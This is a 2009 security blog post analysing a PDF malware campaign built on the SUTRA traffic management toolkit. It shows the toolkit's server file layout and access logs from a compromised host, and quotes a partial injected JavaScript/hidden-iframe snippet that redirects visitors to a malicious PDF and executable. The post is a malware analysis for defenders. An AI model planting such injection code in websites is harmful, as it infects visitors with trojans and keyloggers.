Saturday, March 28, 2009

Black Hat SEO - PDF Malware campaign

The silent threat: Black Hat SEO - PDF Malware campaign

Previously in March, Abode has released some security updates addressed to
vulnerabilities and exploits using Adobe Reader. Some links can be found below

McAfee Avert Labs: New Backdoor Attacks using PDF Documents
Trend Micro Malware Blog: Portable Document Format or Portable Malware Format?
SANS Internet Storm Center: Adobe/Acrobat 0-day in the wild?

Adobe Security Bulletin: Buffer overflow issue

Here is a complete example with sreenshots, data and analysis of a website
used in the PDF malware campaign and hosting a malicious application called SUTRA.

The application also known as "Traffic Management System" is explained by
McAfee AvertLabs on this page: Inside the malicious traffic

This cybercrime toolkit is actively used to manage traffic from compromised
websites and redirects visitors to exploits code or other malicious URLs with
fake codecs, rogue antispyware application, keyloggers, bankers trojan and many more.

We have another example of a compromised website explained here.
Screenshot of SUTRA can be found.


Now let's take a look of another website used.

The site is ""
[Do not enter this site unless you know what you are doing]

The payload is located here "" [Unstable - file not found at this time]

Just for your information, this is the structure of files/folders for SUTRA Traffic Manager

drwxr-xr-x (755) admin
drwxrwxrwx (777) data
drwxr-xr-x (755) files
drwxr-xr-x (755) html
drwxr-xr-x (755) install
drwxrwxrwx (777) memory
drwxrwxrwx (777) stats
drwxrwxrwx (777) admin/tmp
drwxrwxrwx (777) admin/tmp.web
-rwxr-xr-x (755) getos.cgi
-rwxr-xr-x (755) in.cgi
-rw-r--r-- (644) index.html
-rwxr-xr-x (755) c.cgi
-rwxr-xr-x (755) center.cgi
-rwxr-xr-x (755) cron
-rwxr-xr-x (755)
-rw-r--r-- (644) index.html
-rw-r--r-- (644) panel.html
drwxrwxrwx (777) tmp
drwxrwxrwx (777) tmp.web
-rwxr-xr-x (755) ub_fetcher
-rw-r--r-- (644) admin_forces.html
-rw-r--r-- (644) connection_type.html
-rw-r--r-- (644) connection_type_new.html
-rw-r--r-- (644) crontab_wizard.html
-rw-r--r-- (644) edit_force_data.html
-rw-r--r-- (644) edit_force.html
-rw-r--r-- (644) edit.html
-rw-r--r-- (644) edit_user.html
-rw-r--r-- (644) force_data.html
-rw-r--r-- (644) force.html
-rw-r--r-- (644) forces.html
-rw-r--r-- (644) forces_view.html
-rw-r--r-- (644) general_stat.html
-rw-r--r-- (644) GeoIP.dat
-rw-r--r-- (644) geoip.html
-rw-r--r-- (644) global_options.html
-rw-r--r-- (644) global_vars.html
-rw-r--r-- (644) import.html
-rw-r--r-- (644) index.html
-rw-r--r-- (644) key
-rw-r--r-- (644) login.html
-rw-r--r-- (644) lstats_export.html
-rw-r--r-- (644) lstats.html
-rw-r--r-- (644) main.html
-rw-r--r-- (644) navigation.html
-rw-r--r-- (644) page.html
-rw-r--r-- (644) pages_navigation.html
-rw-r--r-- (644) profile.html
-rw-r--r-- (644) pstats_export.html
-rw-r--r-- (644) pstats.html
-rw-r--r-- (644) pstats_index.html
-rw-r--r-- (644) register_done.html
-rw-r--r-- (644) register.html
-rw-r--r-- (644) search.html
-rw-r--r-- (644) show_bottom.html
-rw-r--r-- (644) show_data.html
-rw-r--r-- (644) show_header.html
-rw-r--r-- (644) stat_daily.html
-rw-r--r-- (644) static_stat.html
-rw-r--r-- (644) stat_main.html
-rw-r--r-- (644) stats.html
-rw-r--r-- (644) uptime_main.html
-rw-r--r-- (644) users.html
-rw-r--r-- (644)
-rw-r--r-- (644) counter.gif
-rwxr-xr-x (755) curl
-rwxr-xr-x (755) default.cgi
-rwxr-xr-x (755) gotourl.cgi
-rw-r--r-- (644) image files and javascript (gif, js)
drwxr-xr-x (755) freebsd4 // in.cgi
drwxr-xr-x (755) freebsd5 // in.cgi
drwxr-xr-x (755) freebsd6 // in.cgi
drwxr-xr-x (755) linux // in.cgi
-rw-r--r-- (644) index.html

The admin page has no password on this server so you can enter and see stats like:

So now we know the IP, domain name, URLs used after redirection
but from were is coming the traffic?

Let's take a look of another folder "/memory/"

This folder has files like 1.access.log, 2.access.log, 5.access.log,
25.access.log, 70.access.log etc...

Some related topics on this blog refer to, for another malware campaign... Similars files can be found using google. here and here

2.access.log - The file contain the IP of visitors reaching infected
websites, some are in Czech Republic, Israel, Russia, Turkey etc.
The file also reveal the URL of some compromised websites
were the malicious obfuscated javascript code has been inserted.

Line 1:

Javascript Analysis

Line 23: 77.250.xx.xx

Javascript Analysis

Javascript Analysis

The analysing confirm that all these site has the same code added

if (!myia){ document.write(unescape('
var myia = true; </script>
<iframe name=c15 src=''+
width=52 height=414 style='display: none'></iframe>

Analysis report for hxxp://

The script load a PDF located here[BLOCKED]e30/pdf.php?id=5352
which then load this executable --> VirusTotal Report


Some other related link:

Honeynet Malware Detail
Analysis of hxxp:// here

MySpace Profile Attacked (screenshot below)